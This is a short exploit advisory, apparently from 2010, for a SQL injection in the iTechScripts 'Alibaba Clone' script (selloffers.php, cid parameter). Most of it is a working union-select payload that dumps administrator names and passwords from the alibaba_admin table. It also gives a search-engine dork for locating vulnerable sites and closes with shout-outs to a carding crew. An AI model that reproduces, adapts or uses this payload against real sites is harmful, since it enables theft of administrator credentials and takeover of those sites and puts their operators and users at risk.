-----------------------------------------------------------------------

iTechScripts Alibaba Clone (selloffers.php) SQL Injection Vulnerability

-----------------------------------------------------------------------

Author  	: v3n0m

Site    	: http://yogyacarderlink.web.id/

Date		: November, 16-2010

Location	: Jakarta, Indonesia

Time Zone	: GMT +7:00



Application	: Alibaba Clone

Price		: $199.00

Vendor  	: http://itechscripts.com/

Google Dork	: "Powered by iTechScripts"



Exploit & p0c

_____________



-9999+union+select+all+1,group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin--



http://127.0.0.1/[path]/selloffers.php?cid=[SQLi]

http://127.0.0.1/[path]/selloffers.php?cid=-9999+union+select+all+1,group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin--



ShoutZ

______



All YOGYACARDERLINK CREW, GheMaX, LeQhi

Also Jovita & Fabian :)